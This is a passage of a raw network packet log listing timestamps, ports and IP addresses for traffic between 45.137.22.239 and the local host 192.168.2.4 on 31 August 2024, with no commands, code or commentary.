                    Aug 31, 2024 14:42:22.608748913 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608756065 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608762980 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608771086 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608773947 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608776093 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608782053 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608787060 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608788967 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608793020 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608798981 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608814955 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608823061 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608824968 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608839035 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608856916 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608860016 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608865023 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608891010 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608905077 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608911991 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608918905 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608931065 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608954906 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.608968973 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608977079 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608983994 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.608994007 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.609000921 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.609008074 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.609015942 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.609019041 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.609061003 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.609117031 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.609124899 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.609164953 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.611536026 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.611772060 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.611778975 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.611798048 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.611805916 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.611824989 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.611838102 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.611845970 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.611855030 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.611875057 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.611882925 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.611891985 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.611931086 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.611931086 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.611963987 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612006903 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.612020969 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612029076 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612040043 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612072945 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.612086058 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612148046 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612155914 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612162113 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612169981 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612185001 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612193108 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612199068 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.612221956 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.612242937 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612251043 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612293005 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.612307072 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612313986 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612339020 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612348080 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612354040 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.612392902 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.612466097 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612473965 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612477064 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612493038 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612524986 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.612528086 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612539053 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612545013 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612552881 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612584114 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.612588882 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612597942 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612606049 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.612633944 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.613508940 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613517046 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613565922 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.613574028 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613581896 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613600016 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613606930 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613621950 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613626957 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.613634109 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613636971 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.613657951 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613665104 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.613667011 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613687992 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.613717079 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.613729954 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613744020 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613759041 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613766909 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613791943 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.613804102 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.613811016 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613828897 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613837004 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613884926 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.613912106 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613950968 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.613976002 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.613985062 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614000082 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614008904 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614016056 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614023924 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614027023 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614058018 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614073992 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614084959 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614093065 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614139080 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614176035 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614182949 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614233017 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614238024 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614245892 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614281893 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614290953 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614290953 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614320040 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614324093 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614327908 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614348888 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614356995 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614365101 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614396095 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614398956 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614403963 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614423037 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614429951 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614444017 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614454031 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614469051 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614476919 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614480019 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614516973 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614520073 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614525080 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614533901 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614550114 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614568949 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614587069 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614588022 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614595890 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614619017 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614626884 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614629984 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614639997 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614665031 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614670038 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614672899 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614677906 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614717007 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614737988 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614746094 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614761114 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614768028 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614785910 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614787102 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614794970 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614824057 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614834070 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.614870071 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614953995 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614963055 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614965916 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614972115 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614979982 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614986897 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.614995003 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615003109 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615017891 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615020037 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615025997 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615034103 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615036011 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615041018 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615061998 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615068913 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615070105 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615072012 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615078926 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615083933 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615111113 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615125895 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615132093 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615139961 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615143061 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615149021 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615156889 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615180969 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615190029 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615192890 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615195036 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615205050 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615211964 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615235090 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615259886 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615277052 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615286112 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615288973 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615295887 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615312099 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615319014 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615339041 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615348101 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615356922 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615366936 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615375996 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615384102 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615396976 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615422964 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615436077 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615443945 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615448952 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615499973 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615519047 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615526915 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615530968 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615537882 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615552902 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.615576029 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615586996 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.615612984 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617252111 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617260933 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617273092 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617280960 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617306948 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617372990 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617382050 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617429018 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617441893 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617450953 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617458105 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617465019 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617471933 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617480040 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617495060 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617500067 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617502928 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617513895 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617530107 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617530107 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617538929 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617548943 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617578983 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617671013 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617679119 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617726088 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617813110 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617820978 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617824078 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617830992 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617840052 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617847919 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617855072 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617862940 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617873907 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617875099 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617882013 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617888927 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617897034 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617908001 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617928982 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617930889 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617937088 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.617942095 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.617969036 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618030071 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618168116 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618175030 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618190050 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618196964 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618216991 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618223906 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618227005 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618259907 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618263006 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618268013 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618285894 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618304968 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618313074 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618316889 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618331909 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618339062 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618356943 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618381023 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618385077 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618405104 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618427038 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618433952 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618446112 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618453979 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618477106 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618482113 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618499994 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618511915 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618519068 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618520021 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618561029 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618586063 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618596077 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618637085 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618649006 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618657112 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618700981 CEST4974955615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:22.618786097 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618793011 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618799925 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618807077 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618814945 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618822098 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618828058 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618834972 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618861914 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618870020 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618872881 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618885994 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618892908 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618896008 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618931055 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618938923 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618953943 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.618962049 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619033098 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619040966 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619055033 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619061947 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619127035 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619134903 CEST556154974945.137.22.239192.168.2.4
